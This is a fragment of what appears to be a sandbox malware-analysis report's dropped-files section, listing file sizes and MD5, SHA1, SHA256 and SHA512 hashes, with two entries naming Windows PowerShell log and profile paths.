SHA2560c3322c9edcdab4a1da894c916dab694f06b231deb9382639311b8e8c7743db6
SHA5129029b7b66da4d61061121d7d01609eef2385129451bcf19c34dc4236ffae70d237f2c5c68a94d14907574dfcfde3e8fc67f6b5bd9938e07a99ff48237227e00b
-
Filesize
640KB
MD5f3efc8a74d010991bf0763f1a808b83f
SHA1144f3be90f2a2d69ee1a7cee34c702f736b92b56
SHA25690aaad7e37768be7af736cf22fd5f4a96c76d1c2c92bbd5a319c3af557b900e5
SHA51205c7fdf0117b9ab9b102d7084527405d3eb6c5c44dee5061a0a29e669e817ed3ed468e91b7d2324240fb9ab7066e0286da36d967ca292a9fd21ff88c57cde402
-
Filesize
1.9MB
MD5c7f040c068346a9e7a96bfa978852d20
SHA11ba67dd5611f5d6c861684aa2160331b09883cd3
SHA2560715a5d9b4c1b547a129dc32f345dadfcd43abfdadba5754663c7491652a2402
SHA5125e5a3e6ff8953725e3cf84da79c77fa3553e7132e43722ad08d1962e2a24ec4bec66df4aabf0563e3d9b7ce774700cafd312c5a9031a4cd91bccac9c9ae826fc
-
Filesize
1.5MB
MD5a1fa863b54d7315891e1916db89f2199
SHA11b068487f100ed91c5c396e79c94fe21bdc245ab
SHA256accb47ed2dc451d534a4a1e79a1e70323aa9448fb3ad140fc48b23069c5986b9
SHA5129fb7d135deb72ecf31b7cd0457863b4f94ae4b941fa446dc2ccc5ab889fda9c85d2e085dd380a078adc09e50026077f1d08e2215a65b998d3be8ab0549641b9c
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD5aca1a89e3b1d76d92762d03bb735790d
SHA176d46b8457e5ec99137de34f92c73566aaa0044f
SHA256b6a659b216c14f0494ca364af3fc1b55e3f12ddf322fef9950c52c07325bec67
SHA512dc5cea7b92ceee591bf47e5ec552f28394b14ffa0cc9f9c15d180b9157f476d6e9cf9d777e4c7c2573c4245add1573beaea4530f459503c81d00a713f8637bf3
-
Filesize
2.0MB
MD5418335f68448c7ce1880f6496d8913a4
SHA15f4821d5814db66774768e7962b51390b78fe97f
SHA256ebd567f6a5eea737b4af382f19477d587014f75ecd7b8435d4b820e7d1ab5ed0
SHA5123b10d1a09f7eda275f3f3da827f4ca6780fa57e589e4770834950449622e339a6216bca4eaea7b6d7ce3a12a4cb857870cac009f721bba345a9fc79e3aa65b18
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732